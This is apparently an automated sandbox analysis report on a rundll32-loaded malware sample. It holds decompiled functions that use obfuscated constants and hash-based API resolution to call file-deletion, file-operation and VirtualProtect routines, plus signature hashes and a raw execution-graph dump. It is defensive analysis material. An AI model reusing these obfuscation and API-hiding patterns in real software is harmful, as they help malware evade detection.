                                                                      				intOrPtr* _t50;
                                                                      				void* _t51;
                                                                      				signed int _t53;
                                                                      				void* _t57;
                                                                      
                                                                      				_t57 = __ecx;
                                                                      				E00412550(_t42);
                                                                      				_v20 = 0x33dd;
                                                                      				_t53 = 0x60;
                                                                      				_v20 = _v20 / _t53;
                                                                      				_v20 = _v20 ^ 0x0000445b;
                                                                      				_v8 = 0x98b2;
                                                                      				_v8 = _v8 << 0xa;
                                                                      				_v8 = _v8 | 0x9f0dae98;
                                                                      				_v8 = _v8 + 0xffff2dd8;
                                                                      				_v8 = _v8 ^ 0x9f6f2800;
                                                                      				_v16 = 0x7a4d;
                                                                      				_v16 = _v16 << 5;
                                                                      				_v16 = _v16 ^ 0x630ec107;
                                                                      				_v16 = _v16 ^ 0x6301fd0c;
                                                                      				_v12 = 0xd3a1;
                                                                      				_v12 = _v12 ^ 0x9b5a4994;
                                                                      				_v12 = _v12 + 0xffffbec0;
                                                                      				_v12 = _v12 ^ 0x9b5a0da8;
                                                                      				_t50 = E00407378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
                                                                      				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
                                                                      				return _t51;
                                                                      			}













                                                                      APIs
                                                                      • SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 0041428A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleInformation
                                                                      • String ID:
                                                                      • API String ID: 3935143524-0
                                                                      • Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction ID: a3e86e75239e17fb171a25c98b6967d435d8d6a60c5aeb02e3fa6803c78aa2b8
                                                                      • Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction Fuzzy Hash: 9A114A72E00309BBEB14DFA4CC4AAAEBBB5EF44714F108089E92466291D7B55B509F81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00405AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t47;
                                                                      				int _t57;
                                                                      				signed int _t59;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				E00412550(_t47);
                                                                      				_v20 = 0xc8c;
                                                                      				_v20 = _v20 + 0xffffaa04;
                                                                      				_v20 = _v20 ^ 0xb702763d;
                                                                      				_v20 = _v20 ^ 0x48fdd1a6;
                                                                      				_v16 = 0xeb1c;
                                                                      				_v16 = _v16 << 4;
                                                                      				_t59 = 0xf;
                                                                      				_v16 = _v16 * 0xe;
                                                                      				_v16 = _v16 + 0xffff64c4;
                                                                      				_v16 = _v16 ^ 0x00cd6bec;
                                                                      				_v12 = 0x757;
                                                                      				_v12 = _v12 ^ 0x4183b2e4;
                                                                      				_v12 = _v12 << 2;
                                                                      				_v12 = _v12 / _t59;
                                                                      				_v12 = _v12 ^ 0x0067440e;
                                                                      				_v8 = 0xa082;
                                                                      				_v8 = _v8 >> 1;
                                                                      				_v8 = _v8 >> 8;
                                                                      				_v8 = _v8 ^ 0xcec43627;
                                                                      				_v8 = _v8 ^ 0xcec45939;
                                                                      				E00407378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
                                                                      				_t57 = CloseServiceHandle(_a12); // executed
                                                                      				return _t57;
                                                                      			}











                                                                      APIs
                                                                      • CloseServiceHandle.SECHOST(48FDD1A6), ref: 00405B77
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleService
                                                                      • String ID:
                                                                      • API String ID: 1725840886-0
                                                                      • Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction ID: 1506a155f76b4c60e4096a1e21d349610d66aa9e8fe33e5f3d9433cf1ec1cd13
                                                                      • Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction Fuzzy Hash: 45110371D0020DFFDB08DFA9C94A8EEBBB0FB40304F108599E925A6291D7B99B55DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E0040E554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t42;
                                                                      				int _t51;
                                                                      				signed int _t53;
                                                                      				struct _SHFILEOPSTRUCTW* _t57;
                                                                      
                                                                      				_push(_a4);
                                                                      				_t57 = __edx;
                                                                      				_push(__edx);
                                                                      				E00412550(_t42);
                                                                      				_v20 = 0xead4;
                                                                      				_v20 = _v20 + 0xffff9be4;
                                                                      				_v20 = _v20 ^ 0x000085bc;
                                                                      				_v16 = 0x46f7;
                                                                      				_v16 = _v16 << 0xe;
                                                                      				_v16 = _v16 << 7;
                                                                      				_t53 = 0x39;
                                                                      				_v16 = _v16 / _t53;
                                                                      				_v16 = _v16 ^ 0x03e8aab4;
                                                                      				_v12 = 0x2beb;
                                                                      				_v12 = _v12 ^ 0xafae01c3;
                                                                      				_v12 = _v12 + 0xffff58eb;
                                                                      				_v12 = _v12 ^ 0xa5118136;
                                                                      				_v12 = _v12 ^ 0x0abc415f;
                                                                      				_v8 = 0xa691;
                                                                      				_v8 = _v8 ^ 0x7591c523;
                                                                      				_v8 = _v8 << 0xa;
                                                                      				_v8 = _v8 + 0x20df;
                                                                      				_v8 = _v8 ^ 0x458ea297;
                                                                      				E00407378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
                                                                      				_t51 = SHFileOperationW(_t57); // executed
                                                                      				return _t51;
                                                                      			}











                                                                      APIs
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 0040E60B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileOperation
                                                                      • String ID:
                                                                      • API String ID: 3080627654-0
                                                                      • Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction ID: 3dd06e24261158741585346e8f940a6ca427a5f61c4d66b0dbfef3b0e1201222
                                                                      • Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction Fuzzy Hash: 961123B1D01318BBEB18DFA5C84A8DEBBB4FB00718F108598E825B6241D3B95B44DB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E0040EB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t34;
                                                                      				int _t44;
                                                                      
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00412550(_t34);
                                                                      				_v8 = 0xd1b2;
                                                                      				_v8 = _v8 * 0x63;
                                                                      				_v8 = _v8 << 4;
                                                                      				_v8 = _v8 * 0x74;
                                                                      				_v8 = _v8 ^ 0x4bec8e88;
                                                                      				_v20 = 0x1fc5;
                                                                      				_v20 = _v20 + 0x9c84;
                                                                      				_v20 = _v20 ^ 0x0000b099;
                                                                      				_v16 = 0x542c;
                                                                      				_v16 = _v16 | 0x3ba7d0a3;
                                                                      				_v16 = _v16 ^ 0x3ba7e6ce;
                                                                      				_v12 = 0x8319;
                                                                      				_v12 = _v12 * 0x45;
                                                                      				_v12 = _v12 + 0xffff39a4;
                                                                      				_v12 = _v12 ^ 0x0022b84c;
                                                                      				E00407378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
                                                                      				_t44 = DeleteFileW(_a8); // executed
                                                                      				return _t44;
                                                                      			}









                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(3BA7E6CE), ref: 0040EBC2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction ID: 1a862a12ce259b9b594eaf605fcacc0ae33b71988d820ce1279c505093e24a3a
                                                                      • Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction Fuzzy Hash: 9B11E3B1C0020DFBDF04DFE4DA4689EBBB4FB40314F608599E814A62A1D7749B549F91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E0040F1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t46;
                                                                      				int _t57;
                                                                      				signed int _t59;
                                                                      				signed int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				E00412550(_t46);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0x28beb0;
                                                                      				_v16 = 0xe97b;
                                                                      				_v16 = _v16 >> 3;
                                                                      				_t59 = 0x47;
                                                                      				_v16 = _v16 / _t59;
                                                                      				_v16 = _v16 ^ 0x00001a39;
                                                                      				_v12 = 0x2d01;
                                                                      				_v12 = _v12 >> 8;
                                                                      				_t60 = 0x3a;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 ^ 0x000023d3;
                                                                      				_v20 = 0xc5d9;
                                                                      				_v20 = _v20 | 0x3e7a6da8;
                                                                      				_v20 = _v20 ^ 0x3e7ad9f3;
                                                                      				_v8 = 0x3ddd;
                                                                      				_v8 = _v8 >> 7;
                                                                      				_v8 = _v8 + 0xffffadd9;
                                                                      				_v8 = _v8 ^ 0xffff8e91;
                                                                      				E00407378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
                                                                      				_t57 = CloseHandle(_a12); // executed
                                                                      				return _t57;
                                                                      			}













                                                                      APIs
                                                                      • CloseHandle.KERNEL32(3E7AD9F3), ref: 0040F2A5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000C.00000002.2098113534.0000000000420000.00000040.00020000.sdmp Download File
                                                                      • Associated: 0000000C.00000002.2098150646.0000000000422000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_400000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction ID: 2095a25752144cfccf41e96eaee5510c5b72647c39549051c61099ea1e271914
                                                                      • Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction Fuzzy Hash: 701114B6D0020CEBDF05CFE5C84A9DEBBB5EB14308F108589E914A6290D3B59B649B80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00428361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004283A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction ID: 637bc979103a918286e5382f01602372abea4ab8c4984eea237f75ea849c2a86
                                                                      • Opcode Fuzzy Hash: f469fe6cc5c65eba809066f83245f4e1bd66ea089cc0b94f912417a624723c54
                                                                      • Instruction Fuzzy Hash: AE11DF717023249FD320CF20AC44BABB7E8EB45B11F41453EED46D7240EBF5A8048BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction ID: 560c2e5531f95041473ab5abdf9a332d975f3a18d6c562c3f42fe07e166bb06b
                                                                      • Opcode Fuzzy Hash: 1472a42c10fdf64708459078dabd989573ddb0b2d691415af7d2adfc035da151
                                                                      • Instruction Fuzzy Hash: 413150B2A02219AFDB00DFA5DC44AEF77BCAF55304F41452BF911E3240EB78D9148BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0042847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction ID: 605c18e4e1bdf3c56052bce9c4db53a3c74fed138b051222b05aff1404ffe72f
                                                                      • Opcode Fuzzy Hash: b13fdcab3a368cb303cd6343f0466114add3bfd16c89175a002fa84954f8a16c
                                                                      • Instruction Fuzzy Hash: 0C11E4717023255FD720EF60AC44BABB7E8EB05320F41453EED459B240EBB4B84487AA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction ID: 99280014b4e7568ae5b78b7f4e1cfa4d9ca9bf2b7dd90ccdf1763cf76fa4773a
                                                                      • Opcode Fuzzy Hash: f2edee6e7e9ac4a2c12a34016caccc270bd012c68818faee687fa0a0b208439d
                                                                      • Instruction Fuzzy Hash: 6C11D671B02314AFD720DF65AC44BABB7E8EB05310F45493FED45D7240EBB5A8848BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004282E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004282F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction ID: f632a035e8c56aece19070c7510d802e9804e06d05fa250d5db15c947f9699d3
                                                                      • Opcode Fuzzy Hash: 054316eae768099ac501fd47fccdcfd62b5ce6f092cb257fc86a27f1883456c4
                                                                      • Instruction Fuzzy Hash: 4101A231302328AFDB009F51EC44B9E7B55EB40B54F85403EFD048B251DBB6AC058BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004281C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004281CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction ID: 7300420cbd37d90105d4b3cf7da4562c34fb93397a177b564f82ba5817a4c9b0
                                                                      • Opcode Fuzzy Hash: d3b5d27fa188c06af7d19d4766c461fb26eb3d3432a6a9687b20f338ae7786bb
                                                                      • Instruction Fuzzy Hash: DB01A2313022249BD7109B14ED85B2BB794E741395F85806FEC04CB283DBB9EC528BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 00462BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction ID: b5047ada5e6505b9d9b610dba3069aac40fc24b3776deae8b4cf26fcfcd54791
                                                                      • Opcode Fuzzy Hash: 9f70acf482eb5e79ca196da2ae36f33cf545ac6692aa57f50a78d7a4637a6d96
                                                                      • Instruction Fuzzy Hash: A3214A742046409FDB40DF59C9C1E5A77E8EB49310F158196F988CF2A6E779EC40CB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0F$`
                                                                      • API String ID: 701148680-3237207667
                                                                      • Opcode ID: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction ID: db70940b4a1f0617aeeac80f8a0c91bf787b1828615b15b28606ddd46ecba5aa
                                                                      • Opcode Fuzzy Hash: 5209b332fedc4f6cafecc28ee418f67ac4b0665a7af05f7be5604bd4cc67bf07
                                                                      • Instruction Fuzzy Hash: 13518476B006199BCB00DE5DD9854AF73B9AB48354F1D4026FD06D7360EA38DD02C7AB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00428110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2098177670.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
                                                                      • Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:2.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:940
                                                                      Total number of Limit Nodes:1

                                                                      Graph

4455->4454 4458 1ffd3f5 GetPEB 4455->4458 4458->4454 4459->4450 4461 1ff4b53 4460->4461 4462 1ff68ec GetPEB 4461->4462 4463 1ff4bf3 4462->4463 4463->4450 4465 1ff68ec GetPEB 4464->4465 4466 20005f8 4465->4466 4466->4450 4468 1ff3be2 4467->4468 4469 1ff68ec GetPEB 4468->4469 4470 1ff3c76 4469->4470 4470->4450 4472 1ff6838 4471->4472 4473 1ff68ec GetPEB 4472->4473 4474 1ff68da 4473->4474 4474->4450 4475 1fff52e 4476 1ffb340 GetPEB 4475->4476 4477 1fff69d 4476->4477 4478 1ff74bf GetPEB 4477->4478 4479 1fff6b4 4478->4479 4480 1fff6ed 4479->4480 4484 1ff2b70 4479->4484 4483 1ffe092 GetPEB 4483->4480 4485 1ff2b90 4484->4485 4486 1ff5370 GetPEB 4485->4486 4487 1ff2cde 4486->4487 4488 1ff9a4b GetPEB 4487->4488 4489 1ff2cfc 4488->4489 4490 20002e1 GetPEB 4489->4490 4491 1ff2d0e 4490->4491 4491->4483 4181 1ff70ad 4186 1ff70d5 4181->4186 4182 1ff73d6 4184 1ffb046 GetPEB 4182->4184 4183 1ff73d4 4184->4183 4185 1ff4a6f GetPEB 4185->4186 4186->4182 4186->4183 4186->4185 4187 1ffd4fe GetPEB 4186->4187 4187->4186 4492 1ff3523 4494 1ff363f 4492->4494 4495 1ff3677 4494->4495 4497 1ffaf66 4494->4497 4501 2001d13 4494->4501 4498 1ffaf7c 4497->4498 4499 1ff68ec GetPEB 4498->4499 4500 1ffb00b 4499->4500 4500->4494 4502 2001d29 4501->4502 4503 1ff68ec GetPEB 4502->4503 4504 2001de0 4503->4504 4504->4494 4505 20003df 4506 1ff4a6f GetPEB 4505->4506 4507 2000424 4506->4507 4191 1ff9d95 4194 1ffa07d 4191->4194 4192 1ffd54c GetPEB 4192->4194 4193 1ff4a6f GetPEB 4193->4194 4194->4192 4194->4193 4196 2002982 GetPEB 4194->4196 4197 1ffa24d 4194->4197 4198 1ff502c GetPEB 4194->4198 4199 1ff3c8e GetPEB 4194->4199 4200 20014fc 4194->4200 4196->4194 4198->4194 4199->4194 4201 200163c 4200->4201 4202 1fff965 GetPEB 4201->4202 4203 1ffd54c GetPEB 4201->4203 4204 200189f GetPEB 4201->4204 4205 200170e 4201->4205 4202->4201 4203->4201 4204->4201 4205->4194 4210 1fff793 4212 1fff857 4210->4212 4213 1ff27ec GetPEB 4210->4213 4213->4212 4218 1ff498c 4219 1ff49aa 4218->4219 4220 1ff4a6f GetPEB 4219->4220 
4222 1ff4a3c 4220->4222 4221 1ff4a64 4222->4221 4223 1ffd3f5 GetPEB 4222->4223 4223->4221 4227 1ffdb86 4231 1ffde20 4227->4231 4228 1ffd4fe GetPEB 4228->4231 4229 1ff96ca GetPEB 4229->4231 4230 1ffdf2e 4231->4228 4231->4229 4231->4230 4232 2008f9b GetPEB 4231->4232 4232->4231 4233 2002179 4235 200242a 4233->4235 4234 1ffb340 GetPEB 4234->4235 4235->4234 4236 20024e6 4235->4236 4237 1ff5370 GetPEB 4235->4237 4238 1ff9a4b GetPEB 4235->4238 4239 20002e1 GetPEB 4235->4239 4237->4235 4238->4235 4239->4235 4516 1ff4304 4520 1ff476b 4516->4520 4517 2003805 GetPEB 4517->4520 4518 1ff4964 4519 1ff5370 GetPEB 4519->4520 4520->4517 4520->4518 4520->4519 4521 1ff9a4b GetPEB 4520->4521 4522 1ff4966 4520->4522 4523 200b63c GetPEB 4520->4523 4525 20002e1 GetPEB 4520->4525 4527 200373e 4520->4527 4521->4520 4524 1ffe761 GetPEB 4522->4524 4523->4520 4524->4518 4525->4520 4528 200375e 4527->4528 4529 1ff68ec GetPEB 4528->4529 4530 20037f3 4529->4530 4530->4520 4531 20066fb 4535 2006cc7 4531->4535 4532 1ffeadd GetPEB 4532->4535 4533 1ff58e8 GetPEB 4533->4535 4534 2006ee6 4536 200c4a5 GetPEB 4534->4536 4535->4532 4535->4533 4535->4534 4538 1ff96ca GetPEB 4535->4538 4540 1ff4a6f GetPEB 4535->4540 4543 1ffe4f3 GetPEB 4535->4543 4544 2006ed9 4535->4544 4545 200c4a5 GetPEB 4535->4545 4547 20002e1 GetPEB 4535->4547 4548 1ffc801 4535->4548 4537 2006eff 4536->4537 4552 1ffdf4a 4537->4552 4538->4535 4540->4535 4542 20002e1 GetPEB 4542->4544 4543->4535 4545->4535 4547->4535 4549 1ffc829 4548->4549 4550 20036c4 GetPEB 4549->4550 4551 1ffc849 4550->4551 4551->4535 4553 1ffdf66 4552->4553 4554 20036c4 GetPEB 4553->4554 4555 1ffdf82 4554->4555 4555->4542 4556 20000fe 4557 1ff5370 GetPEB 4556->4557 4558 2000211 4557->4558 4563 2003f43 4558->4563 4561 20002e1 GetPEB 4562 2000238 4561->4562 4564 2003f53 4563->4564 4565 1ff68ec GetPEB 4564->4565 4566 200021f 4565->4566 4566->4561

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0200EB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0200EDD9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.2103524497.0000000001FF0000.00000040.00000001.sdmp, Offset: 01FF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
